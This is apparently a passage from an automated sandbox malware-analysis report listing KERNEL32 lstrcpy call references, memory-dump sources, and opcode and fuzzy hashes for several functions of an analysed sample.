                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: d5340f9a27895a0f059d307fae1786c3aa16626e7c1cff2c4d5ccf2d125d561c
                            • Instruction ID: e659f5dd3e594e53e1d1361005adab482b64cc10cceb20e3e84d33eeeead2056
                            • Opcode Fuzzy Hash: d5340f9a27895a0f059d307fae1786c3aa16626e7c1cff2c4d5ccf2d125d561c
                            • Instruction Fuzzy Hash: 53218E716007119BEB20CB24ED91BBA73A8EB41705F444878F946CBAC4E779E955C750
                            APIs
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000), ref: 0012162D
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 0012164F
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 00121671
                              • Part of subcall function 00121610: lstrcpy.KERNEL32(00000000,?), ref: 00121693
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121557
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121579
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                            • lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: a5f14ca9e326f8c36c47142b36ac065a7dbf0d235318426eb5b4b14d7e8b675f
                            • Instruction ID: c0b4a7a7897ac3e5530fe39a663693be823ad3c19a37053bf455661f4ccc2d2b
                            • Opcode Fuzzy Hash: a5f14ca9e326f8c36c47142b36ac065a7dbf0d235318426eb5b4b14d7e8b675f
                            • Instruction Fuzzy Hash: DE31C575A01B22AFC729DF3AD588956BBF5BF59305700492EE896C3B10DB30F861CB80
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00141771
                            • lstrcpy.KERNEL32(00000000,?), ref: 001417A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 001417E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00141819
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: bc9da1bbf2eaceea29a5078482dce79284d1c9a5ecec83d7eb719f15a6e98b5d
                            • Instruction ID: 9a8887f91e6d1a90787d0b4d38fb565efe8d036714aa50792b8156a718768167
                            • Opcode Fuzzy Hash: bc9da1bbf2eaceea29a5078482dce79284d1c9a5ecec83d7eb719f15a6e98b5d
                            • Instruction Fuzzy Hash: 60212B74601B12ABDB35DF7AD858A1BB7F8BF58741B044A1CE496C7A60DB30F890CB90
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 0012162D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012164F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121671
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121693
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: 363bf1f1f374d9e7b2272324bdc9e6f22b63dfc25deefc39fd67c74fb9f5e353
                            • Instruction ID: ee4b836a1a2afb26aa8ebf2e0b9528d79deb069aa9a2f660dfd350da6f81feb2
                            • Opcode Fuzzy Hash: 363bf1f1f374d9e7b2272324bdc9e6f22b63dfc25deefc39fd67c74fb9f5e353
                            • Instruction Fuzzy Hash: 5F112E74A11B22ABDB24DF35E408A2BB7FCFF58705708052DE496C3A50EB70E861CB90